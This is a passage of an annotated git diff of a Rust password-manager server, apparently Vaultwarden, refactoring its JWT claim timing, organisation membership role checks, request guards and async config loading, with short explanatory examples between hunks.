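        // try_hours yields None on overflow instead of panicking; the diff
        // unwraps at the call sites because these small offsets never overflow.
        let exp = (now + TimeDelta::try_hours(2).unwrap()).timestamp();
        assert!(exp > now.timestamp());
    }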
@@ -283,42 +359,42 @@ pub struct BasicJwtClaims {
 }
 
 pub fn generate_delete_claims(uuid: String) -> BasicJwtClaims {
-    let time_now = Utc::now().naive_utc();
+    let time_now = Utc::now();
     let expire_hours = i64::from(CONFIG.invitation_expiration_hours());
     BasicJwtClaims {
         nbf: time_now.timestamp(),
-        exp: (time_now + Duration::hours(expire_hours)).timestamp(),
+        exp: (time_now + TimeDelta::try_hours(expire_hours).unwrap()).timestamp(),
         iss: JWT_DELETE_ISSUER.to_string(),
         sub: uuid,
     }
 }
 
-pub fn generate_verify_email_claims(uuid: String) -> BasicJwtClaims {
-    let time_now = Utc::now().naive_utc();
+pub fn generate_verify_email_claims(user_id: UserId) -> BasicJwtClaims {
+    let time_now = Utc::now();
     let expire_hours = i64::from(CONFIG.invitation_expiration_hours());
     BasicJwtClaims {
         nbf: time_now.timestamp(),
-        exp: (time_now + Duration::hours(expire_hours)).timestamp(),
+        exp: (time_now + TimeDelta::try_hours(expire_hours).unwrap()).timestamp(),
         iss: JWT_VERIFYEMAIL_ISSUER.to_string(),
-        sub: uuid,
+        sub: user_id.to_string(),
     }
 }
 
 pub fn generate_admin_claims() -> BasicJwtClaims {
-    let time_now = Utc::now().naive_utc();
+    let time_now = Utc::now();
     BasicJwtClaims {
         nbf: time_now.timestamp(),
-        exp: (time_now + Duration::minutes(CONFIG.admin_session_lifetime())).timestamp(),
+        exp: (time_now + TimeDelta::try_minutes(CONFIG.admin_session_lifetime()).unwrap()).timestamp(),
         iss: JWT_ADMIN_ISSUER.to_string(),
         sub: "admin_panel".to_string(),
     }
 }
 
-pub fn generate_send_claims(send_id: &str, file_id: &str) -> BasicJwtClaims {
-    let time_now = Utc::now().naive_utc();
+pub fn generate_send_claims(send_id: &SendId, file_id: &SendFileId) -> BasicJwtClaims {
+    let time_now = Utc::now();
     BasicJwtClaims {
         nbf: time_now.timestamp(),
-        exp: (time_now + Duration::minutes(2)).timestamp(),
+        exp: (time_now + TimeDelta::try_minutes(2).unwrap()).timestamp(),
         iss: JWT_SEND_ISSUER.to_string(),
         sub: format!("{send_id}/{file_id}"),
     }
@@ -333,7 +409,7 @@ use rocket::{
 };
 
 use crate::db::{
-    models::{Collection, Device, User, UserOrgStatus, UserOrgType, UserOrganization, UserStampException},
+    models::{Collection, Device, Membership, MembershipStatus, MembershipType, User, UserStampException},
     DbConn,
 };
 
@@ -355,8 +431,6 @@ impl<'r> FromRequest<'r> for Host {
             referer.to_string()
         } else {
             // Try to guess from the headers
-            use std::env;
-
             let protocol = if let Some(proto) = headers.get_one("X-Forwarded-Proto") {
                 proto
             } else if env::var("ROCKET_TLS").is_ok() {
@@ -367,10 +441,8 @@ impl<'r> FromRequest<'r> for Host {
 
             let host = if let Some(host) = headers.get_one("X-Forwarded-Host") {
                 host
-            } else if let Some(host) = headers.get_one("Host") {
-                host
             } else {
-                ""
+                headers.get_one("Host").unwrap_or_default()
             };
 
             format!("{protocol}://{host}")
@@ -383,7 +455,6 @@ impl<'r> FromRequest<'r> for Host {
 }
 
 pub struct ClientHeaders {
-    pub host: String,
     pub device_type: i32,
     pub ip: ClientIp,
 }
@@ -393,7 +464,6 @@ impl<'r> FromRequest<'r> for ClientHeaders {
     type Error = &'static str;
 
     async fn from_request(request: &'r Request<'_>) -> Outcome<Self, Self::Error> {
-        let host = try_outcome!(Host::from_request(request).await).host;
         let ip = match ClientIp::from_request(request).await {
             Outcome::Success(ip) => ip,
             _ => err_handler!("Error getting Client IP"),
@@ -403,7 +473,6 @@ impl<'r> FromRequest<'r> for ClientHeaders {
             request.headers().get_one("device-type").map(|d| d.parse().unwrap_or(14)).unwrap_or_else(|| 14);
 
         Outcome::Success(ClientHeaders {
-            host,
             device_type,
             ip,
         })
@@ -440,48 +509,44 @@ impl<'r> FromRequest<'r> for Headers {
         };
 
         // Check JWT token is valid and get device and user from it
-        let claims = match decode_login(access_token) {
-            Ok(claims) => claims,
-            Err(_) => err_handler!("Invalid claim"),
+        let Ok(claims) = decode_login(access_token) else {
+            err_handler!("Invalid claim")
         };
 
-        let device_uuid = claims.device;
-        let user_uuid = claims.sub;
+        let device_id = claims.device;
+        let user_id = claims.sub;
 
         let mut conn = match DbConn::from_request(request).await {
             Outcome::Success(conn) => conn,
             _ => err_handler!("Error getting DB"),
         };
 
-        let device = match Device::find_by_uuid_and_user(&device_uuid, &user_uuid, &mut conn).await {
-            Some(device) => device,
-            None => err_handler!("Invalid device id"),
+        let Some(device) = Device::find_by_uuid_and_user(&device_id, &user_id, &mut conn).await else {
+            err_handler!("Invalid device id")
        };
 
-        let user = match User::find_by_uuid(&user_uuid, &mut conn).await {
-            Some(user) => user,
-            None => err_handler!("Device has no user associated"),
+        let Some(user) = User::find_by_uuid(&user_id, &mut conn).await else {
+            err_handler!("Device has no user associated")
         };
 
         if user.security_stamp != claims.sstamp {
             if let Some(stamp_exception) =
                 user.stamp_exception.as_deref().and_then(|s| serde_json::from_str::<UserStampException>(s).ok())
             {
-                let current_route = match request.route().and_then(|r| r.name.as_deref()) {
-                    Some(name) => name,
-                    _ => err_handler!("Error getting current route for stamp exception"),
+                let Some(current_route) = request.route().and_then(|r| r.name.as_deref()) else {
+                    err_handler!("Error getting current route for stamp exception")
                 };
 
                 // Check if the stamp exception has expired first.
                 // Then, check if the current route matches any of the allowed routes.
                 // After that check the stamp in exception matches the one in the claims.
-                if Utc::now().naive_utc().timestamp() > stamp_exception.expire {
+                if Utc::now().timestamp() > stamp_exception.expire {
                     // If the stamp exception has been expired remove it from the database.
                     // This prevents checking this stamp exception for new requests.
                     let mut user = user;
                     user.reset_stamp_exception();
                     if let Err(e) = user.save(&mut conn).await {
-                        error!("Error updating user: {:#?}", e);
+                        error!("Error updating user: {e:#?}");
                     }
                     err_handler!("Stamp exception is expired")
                 } else if !stamp_exception.routes.contains(&current_route.to_string()) {
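The `Headers` extractor also rewrites each single-useful-arm `match` into `let ... else`, which is the idiomatic shape when the failure arm diverges (here via `err_handler!`). The transformation in isolation, on hypothetical types:

    fn find_user(id: u32) -> Option<&'static str> {
        (id == 1).then_some("alice")
    }

    fn lookup(id: u32) -> Result<&'static str, &'static str> {
        // Before: match find_user(id) { Some(u) => u, None => return Err("invalid id") }
        let Some(user) = find_user(id) else {
            return Err("invalid id");
        };
        Ok(user)
    }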
@@ -507,12 +572,30 @@ pub struct OrgHeaders {
     pub host: String,
     pub device: Device,
     pub user: User,
-    pub org_user_type: UserOrgType,
-    pub org_user: UserOrganization,
-    pub org_id: String,
+    pub membership_type: MembershipType,
+    pub membership_status: MembershipStatus,
+    pub membership: Membership,
     pub ip: ClientIp,
 }

+impl OrgHeaders {
+    fn is_member(&self) -> bool {
+        // NOTE: we don't care about MembershipStatus at the moment because this is only used
+        // where an invited, accepted or confirmed user is expected if this ever changes or
+        // if from_i32 is changed to return Some(Revoked) this check needs to be changed accordingly
+        self.membership_type >= MembershipType::User
+    }
+    fn is_confirmed_and_admin(&self) -> bool {
+        self.membership_status == MembershipStatus::Confirmed && self.membership_type >= MembershipType::Admin
+    }
+    fn is_confirmed_and_manager(&self) -> bool {
+        self.membership_status == MembershipStatus::Confirmed && self.membership_type >= MembershipType::Manager
+    }
+    fn is_confirmed_and_owner(&self) -> bool {
+        self.membership_status == MembershipStatus::Confirmed && self.membership_type == MembershipType::Owner
+    }
+}
+
 #[rocket::async_trait]
 impl<'r> FromRequest<'r> for OrgHeaders {
     type Error = &'static str;
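The `>=` comparisons in the new helpers rely on the membership-type enum being ordered, so a check like `membership_type >= MembershipType::Admin` accepts Admin and Owner alike. A self-contained sketch of that idea; the derive and variant values here are illustrative, not the crate's actual definition:

    #[derive(PartialEq, Eq, PartialOrd, Ord, Clone, Copy)]
    enum Role {
        User = 2,
        Manager = 3,
        Admin = 4,
        Owner = 5,
    }

    fn is_admin_or_owner(role: Role) -> bool {
        // Ordering follows the variant order, so Owner >= Admin holds.
        role >= Role::Admin
    }

    fn main() {
        assert!(is_admin_or_owner(Role::Owner));
        assert!(!is_admin_or_owner(Role::Manager));
    }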
@@ -523,56 +606,50 @@ impl<'r> FromRequest<'r> for OrgHeaders {
         // org_id is usually the second path param ("/organizations/<org_id>"),
         // but there are cases where it is a query value.
         // First check the path, if this is not a valid uuid, try the query values.
-        let url_org_id: Option<&str> = {
-            let mut url_org_id = None;
-
-            if let Some(Ok(org_id)) = request.param::<&str>(1) {
-                if uuid::Uuid::parse_str(org_id).is_ok() {
-                    url_org_id = Some(org_id);
-                }
-            }
-
-            if let Some(Ok(org_id)) = request.query_value::<&str>("organizationId") {
-                if uuid::Uuid::parse_str(org_id).is_ok() {
-                    url_org_id = Some(org_id);
-                }
-            }
-
-            url_org_id
+        let url_org_id: Option<OrganizationId> = {
+            if let Some(Ok(org_id)) = request.param::<OrganizationId>(1) {
+                Some(org_id.clone())
+            } else if let Some(Ok(org_id)) = request.query_value::<OrganizationId>("organizationId") {
+                Some(org_id.clone())
+            } else {
+                None
+            }
         };

         match url_org_id {
-            Some(org_id) => {
+            Some(org_id) if uuid::Uuid::parse_str(&org_id).is_ok() => {
                 let mut conn = match DbConn::from_request(request).await {
                     Outcome::Success(conn) => conn,
                     _ => err_handler!("Error getting DB"),
                 };

                 let user = headers.user;
-                let org_user = match UserOrganization::find_by_user_and_org(&user.uuid, org_id, &mut conn).await {
-                    Some(user) => {
-                        if user.status == UserOrgStatus::Confirmed as i32 {
-                            user
-                        } else {
-                            err_handler!("The current user isn't confirmed member of the organization")
-                        }
-                    }
-                    None => err_handler!("The current user isn't member of the organization"),
+                let Some(membership) = Membership::find_by_user_and_org(&user.uuid, &org_id, &mut conn).await else {
+                    err_handler!("The current user isn't member of the organization");
                 };

                 Outcome::Success(Self {
                     host: headers.host,
                     device: headers.device,
                     user,
-                    org_user_type: {
-                        if let Some(org_usr_type) = UserOrgType::from_i32(org_user.atype) {
-                            org_usr_type
+                    membership_type: {
+                        if let Some(member_type) = MembershipType::from_i32(membership.atype) {
+                            member_type
                         } else {
                             // This should only happen if the DB is corrupted
                             err_handler!("Unknown user type in the database")
                         }
                     },
-                    org_user,
-                    org_id: String::from(org_id),
+                    membership_status: {
+                        if let Some(member_status) = MembershipStatus::from_i32(membership.status) {
+                            // NOTE: add additional check for revoked if from_i32 is ever changed
+                            // to return Revoked status.
+                            member_status
+                        } else {
+                            err_handler!("User status is either revoked or invalid.")
+                        }
+                    },
+                    membership,
                     ip: headers.ip,
                 })
             }
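For readers unfamiliar with Rocket's request API used above: `request.param::<T>(n)` yields the n-th path segment as `Option<Result<T, _>>`, and `request.query_value::<T>(name)` does the same for a query parameter, which is why both are matched with `Some(Ok(..))`. A rough standalone sketch under Rocket 0.5; the route shape and use of plain `String` are assumptions for illustration:

    use rocket::request::Request;

    // Sketch only: pull an id from "/organizations/<org_id>" or "?organizationId=..".
    fn extract_org_id(request: &Request<'_>) -> Option<String> {
        if let Some(Ok(id)) = request.param::<String>(1) {
            return Some(id);
        }
        if let Some(Ok(id)) = request.query_value::<String>("organizationId") {
            return Some(id);
        }
        None
    }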
@@ -585,9 +662,9 @@ pub struct AdminHeaders {
     pub host: String,
     pub device: Device,
     pub user: User,
-    pub org_user_type: UserOrgType,
-    pub client_version: Option<String>,
+    pub membership_type: MembershipType,
     pub ip: ClientIp,
+    pub org_id: OrganizationId,
 }

 #[rocket::async_trait]
@@ -596,15 +673,14 @@ impl<'r> FromRequest<'r> for AdminHeaders {

     async fn from_request(request: &'r Request<'_>) -> Outcome<Self, Self::Error> {
         let headers = try_outcome!(OrgHeaders::from_request(request).await);
-        let client_version = request.headers().get_one("Bitwarden-Client-Version").map(String::from);
-        if headers.org_user_type >= UserOrgType::Admin {
+        if headers.is_confirmed_and_admin() {
             Outcome::Success(Self {
                 host: headers.host,
                 device: headers.device,
                 user: headers.user,
-                org_user_type: headers.org_user_type,
-                client_version,
+                membership_type: headers.membership_type,
                 ip: headers.ip,
+                org_id: headers.membership.org_uuid,
             })
         } else {
             err_handler!("You need to be Admin or Owner to call this endpoint")
@@ -612,30 +688,19 @@ impl<'r> FromRequest<'r> for AdminHeaders {
         }
     }
 }

-impl From<AdminHeaders> for Headers {
-    fn from(h: AdminHeaders) -> Headers {
-        Headers {
-            host: h.host,
-            device: h.device,
-            user: h.user,
-            ip: h.ip,
-        }
-    }
-}
-
 // col_id is usually the fourth path param ("/organizations/<org_id>/collections/<col_id>"),
 // but there could be cases where it is a query value.
 // First check the path, if this is not a valid uuid, try the query values.
-fn get_col_id(request: &Request<'_>) -> Option<String> {
+fn get_col_id(request: &Request<'_>) -> Option<CollectionId> {
     if let Some(Ok(col_id)) = request.param::<String>(3) {
         if uuid::Uuid::parse_str(&col_id).is_ok() {
-            return Some(col_id);
+            return Some(col_id.into());
         }
     }

     if let Some(Ok(col_id)) = request.query_value::<String>("collectionId") {
         if uuid::Uuid::parse_str(&col_id).is_ok() {
-            return Some(col_id);
+            return Some(col_id.into());
         }
     }

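`get_col_id` now returns a `CollectionId` instead of a bare `String`; the `col_id.into()` and, later, `col_id.as_ref()` calls suggest a newtype wrapper implementing `From<String>` and `AsRef<str>`. A hypothetical minimal version of such an id type (the real one lives in the db models and likely carries more derives):

    // Hypothetical sketch of a typed id wrapper.
    #[derive(Clone, Debug, PartialEq, Eq, Hash)]
    struct CollectionId(String);

    impl From<String> for CollectionId {
        fn from(raw: String) -> Self {
            Self(raw)
        }
    }

    impl AsRef<str> for CollectionId {
        fn as_ref(&self) -> &str {
            &self.0
        }
    }

    fn main() {
        let col: CollectionId = "3fa85f64-5717-4562-b3fc-2c963f66afa6".to_string().into();
        assert!(uuid::Uuid::parse_str(col.as_ref()).is_ok());
    }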
@@ -649,8 +714,8 @@ pub struct ManagerHeaders {
     pub host: String,
     pub device: Device,
     pub user: User,
-    pub org_user_type: UserOrgType,
     pub ip: ClientIp,
+    pub org_id: OrganizationId,
 }

 #[rocket::async_trait]
@@ -659,7 +724,7 @@ impl<'r> FromRequest<'r> for ManagerHeaders {

     async fn from_request(request: &'r Request<'_>) -> Outcome<Self, Self::Error> {
         let headers = try_outcome!(OrgHeaders::from_request(request).await);
-        if headers.org_user_type >= UserOrgType::Manager {
+        if headers.is_confirmed_and_manager() {
             match get_col_id(request) {
                 Some(col_id) => {
                     let mut conn = match DbConn::from_request(request).await {
@@ -667,7 +732,7 @@ impl<'r> FromRequest<'r> for ManagerHeaders {
                         _ => err_handler!("Error getting DB"),
                     };

-                    if !can_access_collection(&headers.org_user, &col_id, &mut conn).await {
+                    if !Collection::can_access_collection(&headers.membership, &col_id, &mut conn).await {
                         err_handler!("The current user isn't a manager for this collection")
                     }
                 }
@@ -678,8 +743,8 @@ impl<'r> FromRequest<'r> for ManagerHeaders {
                 host: headers.host,
                 device: headers.device,
                 user: headers.user,
-                org_user_type: headers.org_user_type,
                 ip: headers.ip,
+                org_id: headers.membership.org_uuid,
             })
         } else {
             err_handler!("You need to be a Manager, Admin or Owner to call this endpoint")
@@ -704,8 +769,7 @@ pub struct ManagerHeadersLoose {
     pub host: String,
     pub device: Device,
     pub user: User,
-    pub org_user: UserOrganization,
-    pub org_user_type: UserOrgType,
+    pub membership: Membership,
     pub ip: ClientIp,
 }

@@ -715,13 +779,12 @@ impl<'r> FromRequest<'r> for ManagerHeadersLoose {

     async fn from_request(request: &'r Request<'_>) -> Outcome<Self, Self::Error> {
         let headers = try_outcome!(OrgHeaders::from_request(request).await);
-        if headers.org_user_type >= UserOrgType::Manager {
+        if headers.is_confirmed_and_manager() {
             Outcome::Success(Self {
                 host: headers.host,
                 device: headers.device,
                 user: headers.user,
-                org_user: headers.org_user,
-                org_user_type: headers.org_user_type,
+                membership: headers.membership,
                 ip: headers.ip,
             })
         } else {
@@ -740,22 +803,18 @@ impl From<ManagerHeadersLoose> for Headers {
         }
     }
 }
-async fn can_access_collection(org_user: &UserOrganization, col_id: &str, conn: &mut DbConn) -> bool {
-    org_user.has_full_access()
-        || Collection::has_access_by_collection_and_user_uuid(col_id, &org_user.user_uuid, conn).await
-}

 impl ManagerHeaders {
     pub async fn from_loose(
         h: ManagerHeadersLoose,
-        collections: &Vec<String>,
+        collections: &Vec<CollectionId>,
         conn: &mut DbConn,
     ) -> Result<ManagerHeaders, Error> {
         for col_id in collections {
-            if uuid::Uuid::parse_str(col_id).is_err() {
+            if uuid::Uuid::parse_str(col_id.as_ref()).is_err() {
                 err!("Collection Id is malformed!");
             }
-            if !can_access_collection(&h.org_user, col_id, conn).await {
+            if !Collection::can_access_collection(&h.membership, col_id, conn).await {
                 err!("You don't have access to all collections!");
             }
         }
@@ -764,17 +823,17 @@ impl ManagerHeaders {
             host: h.host,
             device: h.device,
             user: h.user,
-            org_user_type: h.org_user_type,
             ip: h.ip,
+            org_id: h.membership.org_uuid,
         })
     }
 }

 pub struct OwnerHeaders {
-    pub host: String,
     pub device: Device,
     pub user: User,
     pub ip: ClientIp,
+    pub org_id: OrganizationId,
 }

 #[rocket::async_trait]
@@ -783,12 +842,12 @@ impl<'r> FromRequest<'r> for OwnerHeaders {

     async fn from_request(request: &'r Request<'_>) -> Outcome<Self, Self::Error> {
         let headers = try_outcome!(OrgHeaders::from_request(request).await);
-        if headers.org_user_type == UserOrgType::Owner {
+        if headers.is_confirmed_and_owner() {
             Outcome::Success(Self {
-                host: headers.host,
                 device: headers.device,
                 user: headers.user,
                 ip: headers.ip,
+                org_id: headers.membership.org_uuid,
             })
         } else {
             err_handler!("You need to be Owner to call this endpoint")
@@ -796,10 +855,48 @@ impl<'r> FromRequest<'r> for OwnerHeaders {
         }
     }
 }

+pub struct OrgMemberHeaders {
+    pub host: String,
+    pub device: Device,
+    pub user: User,
+    pub membership: Membership,
+    pub ip: ClientIp,
+}
+
+#[rocket::async_trait]
+impl<'r> FromRequest<'r> for OrgMemberHeaders {
+    type Error = &'static str;
+
+    async fn from_request(request: &'r Request<'_>) -> Outcome<Self, Self::Error> {
+        let headers = try_outcome!(OrgHeaders::from_request(request).await);
+        if headers.is_member() {
+            Outcome::Success(Self {
+                host: headers.host,
+                device: headers.device,
+                user: headers.user,
+                membership: headers.membership,
+                ip: headers.ip,
+            })
+        } else {
+            err_handler!("You need to be a Member of the Organization to call this endpoint")
+        }
+    }
+}
+
+impl From<OrgMemberHeaders> for Headers {
+    fn from(h: OrgMemberHeaders) -> Headers {
+        Headers {
+            host: h.host,
+            device: h.device,
+            user: h.user,
+            ip: h.ip,
+        }
+    }
+}
+
 //
 // Client IP address detection
 //
-use std::net::IpAddr;

 pub struct ClientIp {
     pub ip: IpAddr,
@@ -817,7 +914,7 @@ impl<'r> FromRequest<'r> for ClientIp {
                     None => ip,
                 }
                 .parse()
-                .map_err(|_| warn!("'{}' header is malformed: {}", CONFIG.ip_header(), ip))
+                .map_err(|_| warn!("'{}' header is malformed: {ip}", CONFIG.ip_header()))
                 .ok()
             })
         } else {
@@ -832,6 +929,35 @@ impl<'r> FromRequest<'r> for ClientIp {
     }
 }

+pub struct Secure {
+    pub https: bool,
+}
+
+#[rocket::async_trait]
+impl<'r> FromRequest<'r> for Secure {
+    type Error = ();
+
+    async fn from_request(request: &'r Request<'_>) -> Outcome<Self, Self::Error> {
+        let headers = request.headers();
+
+        // Try to guess from the headers
+        let protocol = match headers.get_one("X-Forwarded-Proto") {
+            Some(proto) => proto,
+            None => {
+                if env::var("ROCKET_TLS").is_ok() {
+                    "https"
+                } else {
+                    "http"
+                }
+            }
+        };
+
+        Outcome::Success(Secure {
+            https: protocol == "https",
+        })
+    }
+}
+
 pub struct WsAccessTokenHeader {
     pub access_token: Option<String>,
 }
@@ -854,3 +980,24 @@ impl<'r> FromRequest<'r> for WsAccessTokenHeader {
         })
     }
 }
+
+pub struct ClientVersion(pub semver::Version);
+
+#[rocket::async_trait]
+impl<'r> FromRequest<'r> for ClientVersion {
+    type Error = &'static str;
+
+    async fn from_request(request: &'r Request<'_>) -> Outcome<Self, Self::Error> {
+        let headers = request.headers();
+
+        let Some(version) = headers.get_one("Bitwarden-Client-Version") else {
+            err_handler!("No Bitwarden-Client-Version header provided")
+        };
+
+        let Ok(version) = semver::Version::parse(version) else {
+            err_handler!("Invalid Bitwarden-Client-Version header provided")
+        };
+
+        Outcome::Success(ClientVersion(version))
+    }
+}
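The new `ClientVersion` guard leans on the `semver` crate: `semver::Version::parse` accepts the `MAJOR.MINOR.PATCH` strings the Bitwarden clients send in `Bitwarden-Client-Version`, and parsed versions compare semantically. The parsing step on its own (the version strings are illustrative):

    // Sketch: parse and compare client versions the way the new guard does.
    fn main() {
        let version = semver::Version::parse("2024.6.2").expect("valid semver");
        let cutoff = semver::Version::parse("2024.6.0").expect("valid semver");
        // Parsed versions order semantically, so feature gating by version works.
        assert!(version >= cutoff);
        println!("client version: {version}");
    }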
497 changes: src/config.rs
@@ -1,6 +1,11 @@
-use std::env::consts::EXE_SUFFIX;
-use std::process::exit;
-use std::sync::RwLock;
+use std::{
+    env::consts::EXE_SUFFIX,
+    process::exit,
+    sync::{
+        atomic::{AtomicBool, Ordering},
+        LazyLock, RwLock,
+    },
+};

 use job_scheduler_ng::Schedule;
 use once_cell::sync::Lazy;
@@ -9,7 +14,7 @@ use reqwest::Url;
 use crate::{
     db::DbConnType,
     error::Error,
-    util::{get_env, get_env_bool, parse_experimental_client_feature_flags},
+    util::{get_env, get_env_bool, get_web_vault_version, is_valid_email, parse_experimental_client_feature_flags},
 };

 static CONFIG_FILE: Lazy<String> = Lazy::new(|| {
@@ -17,8 +22,32 @@ static CONFIG_FILE: Lazy<String> = Lazy::new(|| {
     get_env("CONFIG_FILE").unwrap_or_else(|| format!("{data_folder}/config.json"))
 });

+static CONFIG_FILE_PARENT_DIR: LazyLock<String> = LazyLock::new(|| {
+    let path = std::path::PathBuf::from(&*CONFIG_FILE);
+    path.parent().unwrap_or(std::path::Path::new("data")).to_str().unwrap_or("data").to_string()
+});
+
+static CONFIG_FILENAME: LazyLock<String> = LazyLock::new(|| {
+    let path = std::path::PathBuf::from(&*CONFIG_FILE);
+    path.file_name().unwrap_or(std::ffi::OsStr::new("config.json")).to_str().unwrap_or("config.json").to_string()
+});
+
+pub static SKIP_CONFIG_VALIDATION: AtomicBool = AtomicBool::new(false);
+
 pub static CONFIG: Lazy<Config> = Lazy::new(|| {
-    Config::load().unwrap_or_else(|e| {
+    std::thread::spawn(|| {
+        let rt = tokio::runtime::Builder::new_current_thread().enable_all().build().unwrap_or_else(|e| {
+            println!("Error loading config:\n {e:?}\n");
+            exit(12)
+        });
+
+        rt.block_on(Config::load()).unwrap_or_else(|e| {
+            println!("Error loading config:\n {e:?}\n");
+            exit(12)
+        })
+    })
+    .join()
+    .unwrap_or_else(|e| {
         println!("Error loading config:\n {e:?}\n");
         exit(12)
     })
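Because `Config::load()` is now async while `CONFIG` stays a synchronous `Lazy`, the initializer spawns a throwaway thread, builds a single-threaded Tokio runtime there, and blocks on the future; using a fresh thread avoids the panic you get from calling `block_on` inside an already-running runtime. The shape of the trick in isolation (the loaded type is a stand-in):

    use once_cell::sync::Lazy;

    async fn load() -> Result<String, String> {
        Ok("loaded".to_string()) // stand-in for the real async config load
    }

    static CONFIG: Lazy<String> = Lazy::new(|| {
        // A dedicated thread + current_thread runtime lets sync code block on
        // async work even when the caller is itself inside a Tokio runtime.
        std::thread::spawn(|| {
            let rt = tokio::runtime::Builder::new_current_thread().enable_all().build().expect("runtime");
            rt.block_on(load()).expect("config")
        })
        .join()
        .expect("config thread panicked")
    });

    fn main() {
        println!("{}", *CONFIG);
    }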
@@ -39,7 +68,6 @@ macro_rules! make_config {

     struct Inner {
         rocket_shutdown_handle: Option<rocket::Shutdown>,
-        ws_shutdown_handle: Option<tokio::sync::oneshot::Sender<()>>,

         templates: Handlebars<'static>,
         config: ConfigItems,
@@ -98,16 +126,25 @@ macro_rules! make_config {

             let mut builder = ConfigBuilder::default();
             $($(
-                builder.$name = make_config! { @getenv paste::paste!(stringify!([<$name:upper>])), $ty };
+                builder.$name = make_config! { @getenv pastey::paste!(stringify!([<$name:upper>])), $ty };
             )+)+

             builder
         }

-        fn from_file(path: &str) -> Result<Self, Error> {
-            let config_str = std::fs::read_to_string(path)?;
-            println!("[INFO] Using saved config from `{path}` for configuration.\n");
-            serde_json::from_str(&config_str).map_err(Into::into)
+        async fn from_file() -> Result<Self, Error> {
+            let operator = opendal_operator_for_path(&CONFIG_FILE_PARENT_DIR)?;
+            let config_bytes = operator.read(&CONFIG_FILENAME).await?;
+            println!("[INFO] Using saved config from `{}` for configuration.\n", *CONFIG_FILE);
+            serde_json::from_slice(&config_bytes.to_vec()).map_err(Into::into)
+        }
+
+        fn clear_non_editable(&mut self) {
+            $($(
+                if !$editable {
+                    self.$name = None;
+                }
+            )+)+
         }

         /// Merges the values of both builders into a new builder.
@@ -119,7 +156,7 @@ macro_rules! make_config {
                     builder.$name = v.clone();

                     if self.$name.is_some() {
-                        overrides.push(paste::paste!(stringify!([<$name:upper>])).into());
+                        overrides.push(pastey::paste!(stringify!([<$name:upper>])).into());
                     }
                 }
             )+)+
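`from_file` now goes through an OpenDAL operator instead of `std::fs`, so the same code path can read the config from the local filesystem or, with the `s3` feature defined later in this diff, from a bucket. A minimal sketch of the filesystem case, assuming the `opendal` crate and a Tokio context:

    // Sketch: read a file through OpenDAL's Fs service, as from_file() now does.
    async fn read_config(dir: &str, name: &str) -> anyhow::Result<Vec<u8>> {
        let builder = opendal::services::Fs::default().root(dir);
        let operator = opendal::Operator::new(builder)?.finish();
        // `read` returns an opendal::Buffer; to_vec() copies it into contiguous bytes.
        Ok(operator.read(name).await?.to_vec())
    }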
@@ -147,6 +184,12 @@ macro_rules! make_config {
             config.signups_domains_whitelist = config.signups_domains_whitelist.trim().to_lowercase();
             config.org_creation_users = config.org_creation_users.trim().to_lowercase();

+            // Copy the values from the deprecated flags to the new ones
+            if config.http_request_block_regex.is_none() {
+                config.http_request_block_regex = config.icon_blacklist_regex.clone();
+            }
+
             config
         }
     }
@@ -211,7 +254,7 @@ macro_rules! make_config {
                 element.insert("default".into(), serde_json::to_value(def.$name).unwrap());
                 element.insert("type".into(), (_get_form_type(stringify!($ty))).into());
                 element.insert("doc".into(), (_get_doc(concat!($($doc),+))).into());
-                element.insert("overridden".into(), (overridden.contains(&paste::paste!(stringify!([<$name:upper>])).into())).into());
+                element.insert("overridden".into(), (overridden.contains(&pastey::paste!(stringify!([<$name:upper>])).into())).into());
                 element
             }),
         )+
@@ -228,6 +271,7 @@ macro_rules! make_config {
         // Besides Pass, only String types will be masked via _privacy_mask.
         const PRIVACY_CONFIG: &[&str] = &[
             "allowed_iframe_ancestors",
+            "allowed_connect_src",
             "database_url",
             "domain_origin",
             "domain_path",
@@ -238,6 +282,7 @@ macro_rules! make_config {
             "smtp_from",
             "smtp_host",
             "smtp_username",
+            "_smtp_img_src",
         ];

         let cfg = {
@@ -326,7 +371,7 @@ macro_rules! make_config {
             }
         }
     }};
-    ( @build $value:expr, $config:expr, gen, $default_fn:expr ) => {{
+    ( @build $value:expr, $config:expr, generated, $default_fn:expr ) => {{
         let f: &dyn Fn(&ConfigItems) -> _ = &$default_fn;
         f($config)
     }};
@@ -344,38 +389,34 @@ macro_rules! make_config {
 // }
 //
 // Where action applied when the value wasn't provided and can be:
 //  def: Use a default value
 //  auto: Value is auto generated based on other values
 //  option: Value is optional
-//  gen: Value is always autogenerated and it's original value ignored
+//  generated: Value is always autogenerated and it's original value ignored
 make_config! {
     folders {
         /// Data folder |> Main data folder
         data_folder: String, false, def, "data".to_string();
         /// Database URL
-        database_url: String, false, auto, |c| format!("{}/{}", c.data_folder, "db.sqlite3");
+        database_url: String, false, auto, |c| format!("{}/db.sqlite3", c.data_folder);
         /// Icon cache folder
-        icon_cache_folder: String, false, auto, |c| format!("{}/{}", c.data_folder, "icon_cache");
+        icon_cache_folder: String, false, auto, |c| format!("{}/icon_cache", c.data_folder);
         /// Attachments folder
-        attachments_folder: String, false, auto, |c| format!("{}/{}", c.data_folder, "attachments");
+        attachments_folder: String, false, auto, |c| format!("{}/attachments", c.data_folder);
         /// Sends folder
-        sends_folder: String, false, auto, |c| format!("{}/{}", c.data_folder, "sends");
+        sends_folder: String, false, auto, |c| format!("{}/sends", c.data_folder);
         /// Temp folder |> Used for storing temporary file uploads
-        tmp_folder: String, false, auto, |c| format!("{}/{}", c.data_folder, "tmp");
+        tmp_folder: String, false, auto, |c| format!("{}/tmp", c.data_folder);
         /// Templates folder
-        templates_folder: String, false, auto, |c| format!("{}/{}", c.data_folder, "templates");
+        templates_folder: String, false, auto, |c| format!("{}/templates", c.data_folder);
         /// Session JWT key
-        rsa_key_filename: String, false, auto, |c| format!("{}/{}", c.data_folder, "rsa_key");
+        rsa_key_filename: String, false, auto, |c| format!("{}/rsa_key", c.data_folder);
         /// Web vault folder
         web_vault_folder: String, false, def, "web-vault/".to_string();
     },
     ws {
         /// Enable websocket notifications
-        websocket_enabled: bool, false, def, false;
-        /// Websocket address
-        websocket_address: String, false, def, "0.0.0.0".to_string();
-        /// Websocket port
-        websocket_port: u16, false, def, 3012;
+        enable_websocket: bool, false, def, true;
     },
     push {
         /// Enable push notifications
@@ -414,7 +455,9 @@ make_config! {
         /// Auth Request cleanup schedule |> Cron schedule of the job that cleans old auth requests from the auth request.
         /// Defaults to every minute. Set blank to disable this job.
         auth_request_purge_schedule: String, false, def, "30 * * * * *".to_string();
+        /// Duo Auth context cleanup schedule |> Cron schedule of the job that cleans expired Duo contexts from the database. Does nothing if Duo MFA is disabled or set to use the legacy iframe prompt.
